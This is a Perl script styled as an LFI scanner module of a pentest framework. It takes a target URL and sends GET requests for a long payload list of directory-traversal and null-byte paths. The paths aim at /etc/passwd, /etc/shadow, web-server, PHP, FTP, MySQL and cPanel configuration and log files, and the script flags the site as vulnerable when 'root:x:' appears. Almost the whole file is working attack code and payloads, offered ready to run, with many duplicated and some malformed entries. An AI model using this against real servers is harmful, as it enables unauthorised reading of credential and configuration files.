#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor;

system('','');
print"\033[1;37m Pentest>> (\033[0;34m modules/scanners)(\033[0;31mscanner/lfi_scanner\033[0;32m (set Target) \033[1;37m) ";
chomp(my $target = <STDIN>);

if($target !~ /http:\/\//) { $target = "http://$target"; }

print "\npress [enter] to check the version of httpd[...]\n";
$httpd =<STDIN>;

$host = $target;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;

print "\npress [enter] to check the vulnerability in lfi[...]\n";
$start =<STDIN>;


@vulnerabilities = ('/etc/passwd',
'/etc/shadow',
'/etc/group',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/var/log/apache/access_log',
'/var/log/apache2/access_log',
'/var/log/apache/access.log',
'/var/log/apache2/access.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache2/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/error.log',
'/var/log/error_log',
'/var/log/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/log/error_log',
'/var/log/error.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error_log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error_log',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/error.log',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/access_log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/access_log',
'/var/log/error_log',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache/httpd.conf',
'/usr/local/apache2/httpd.conf',
'/usr/local/httpd/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache2/conf/httpd.conf',
'/usr/local/etc/httpd/conf/httpd.conf',
'/usr/apache2/conf/httpd.conf',
'/usr/apache/conf/httpd.conf',
'/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/etc/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/http/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/etc/httpd/httpd.conf',
'/etc/http/httpd.conf',
'/etc/httpd.conf',
'/opt/apache/conf/httpd.conf',
'/opt/apache2/conf/httpd.conf',
'/var/www/conf/httpd.conf',
'/private/etc/httpd/httpd.conf',
'/private/etc/httpd/httpd.conf.default',
'/Volumes/webBackup/opt/apache2/conf/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
'/Program Files\Apache Group\Apache\conf\httpd.conf',
'/Program Files\Apache Group\Apache2\conf\httpd.conf',
'/Program Files\xampp\apache\conf\httpd.conf',
'/usr/local/php/httpd.conf.php',
'/usr/local/php4/httpd.conf.php',
'/usr/local/php5/httpd.conf.php',
'/usr/local/php/httpd.conf',
'/usr/local/php4/httpd.conf',
'/usr/local/php5/httpd.conf',
'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
'/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
'/usr/local/etc/apache/vhosts.conf',
'/etc/php.ini',
'/bin/php.ini',
'/etc/httpd/php.ini',
'/usr/lib/php.ini',
'/usr/lib/php/php.ini',
'/usr/local/etc/php.ini',
'/usr/local/lib/php.ini',
'/usr/local/php/lib/php.ini',
'/usr/local/php4/lib/php.ini',
'/usr/local/php5/lib/php.ini',
'/usr/local/apache/conf/php.ini',
'/etc/php4.4/fcgi/php.ini',
'/etc/php4/apache/php.ini',
'/etc/php4/apache2/php.ini',
'/etc/php5/apache/php.ini',
'/etc/php5/apache2/php.ini',
'/etc/php/php.ini',
'/etc/php/php4/php.ini',
'/etc/php/apache/php.ini',
'/etc/php/apache2/php.ini',
'/web/conf/php.ini',
'/usr/local/Zend/etc/php.ini',
'/opt/xampp/etc/php.ini',
'/var/local/www/conf/php.ini',
'/etc/php/cgi/php.ini',
'/etc/php4/cgi/php.ini',
'/etc/php5/cgi/php.ini',
'/php5\php.ini',
'/php4\php.ini',
'/php\php.ini',
'/PHP\php.ini',
'/WINDOWS\php.ini',
'/WINNT\php.ini',
'/apache\php\php.ini',
'/xampp\apache\bin\php.ini',
'/NetServer\bin\stable\apache\php.ini',
'/home2\bin\stable\apache\php.ini',
'/home\bin\stable\apache\php.ini',
'/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
'/usr/local/cpanel/logs',
'/usr/local/cpanel/logs/stats_log',
'/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log',
'/usr/local/cpanel/logs/license_log',
'/usr/local/cpanel/logs/login_log',
'/usr/local/cpanel/logs/stats_log',
'/var/cpanel/cpanel.config',
'/var/log/mysql/mysql-bin.log',
'/var/log/mysql.log',
'/var/log/mysqlderror.log',
'/var/log/mysql/mysql.log',
'/var/log/mysql/mysql-slow.log',
'/var/mysql.log',
'/var/lib/mysql/my.cnf',
'/etc/mysql/my.cnf',
'/etc/my.cnf',
'/etc/logrotate.d/proftpd',
'/www/logs/proftpd.system.log',
'/var/log/proftpd',
'/etc/proftp.conf',
'/etc/protpd/proftpd.conf',
'/etc/vhcs2/proftpd/proftpd.conf',
'/etc/proftpd/modules.conf',
'/var/log/vsftpd.log',
'/etc/vsftpd.chroot_list',
'/etc/logrotate.d/vsftpd.log',
'/etc/vsftpd/vsftpd.conf',
'/etc/vsftpd.conf',
'/etc/chrootUsers',
'/var/log/xferlog',
'/var/adm/log/xferlog',
'/etc/wu-ftpd/ftpaccess',
'/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers',
'/usr/sbin/pure-config.pl',
'/usr/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.conf',
'/usr/local/etc/pure-ftpd.conf',
'/usr/local/etc/pureftpd.pdb',
'/usr/local/pureftpd/etc/pureftpd.pdb',
'/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/pureftpd/etc/pure-ftpd.conf',
'-/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.pdb',
'/etc/pureftpd.pdb',
'/etc/pureftpd.passwd',
'/etc/pure-ftpd/pureftpd.pdb',
'/usr/ports/ftp/pure-ftpd/',
'/usr/ports/net/pure-ftpd/',
'/usr/pkgsrc/net/pureftpd/',
'/usr/ports/contrib/pure-ftpd/',
'/var/log/pure-ftpd/pure-ftpd.log',
'/logs/pure-ftpd.log',
'/var/log/pureftpd.log',
'/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/ftp-proxy',
'/var/log/ftplog',
'/etc/logrotate.d/ftp',
'/etc/ftpchroot',
'/etc/ftphosts',
'/var/log/exim_mainlog',
'/var/log/exim/mainlog',
'/var/log/maillog',
'/var/log/exim_paniclog',
'/var/log/exim/paniclog',
'/var/log/exim/rejectlog',
'/var/log/exim_rejectlog',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../../../../../var/www/logs/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../../../../../var/www/logs/error.log%00',
'../../../../../../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../../../../../var/log/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache/error.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
'../../../../../../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../../../../../var/log/error.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log');

print "\tPAYLOAD LOADED IN PROGRESS...\n\n";


foreach $scan(@vulnerabilities){

$url = $target.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;}
else { $msg = "Not Vulnerable";}

print "$scan..........[$msg]\n";
}
